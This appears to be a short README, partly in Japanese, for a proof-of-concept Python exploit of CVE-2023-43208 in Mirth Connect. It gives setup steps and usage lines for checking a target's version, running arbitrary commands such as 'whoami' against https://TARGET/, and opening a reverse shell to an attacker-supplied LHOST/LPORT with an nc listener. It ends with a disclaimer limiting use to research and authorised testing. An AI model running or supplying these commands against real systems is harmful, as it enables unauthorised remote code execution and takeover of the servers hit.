
Mirth Connect における CVE‑2023‑43208 を実証する概念実証(PoC)Python スクリプト。脆弱なインスタンス上でのバージョン確認とコマンド実行を可能にします。
# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install pinned dependencies
pip install -r requirements.txt
# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
この概念実証(PoC)は研究および教育目的のみで提供されます。 所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。 作者は、このコードによって引き起こされた誤用または損害について一切責任を負いません。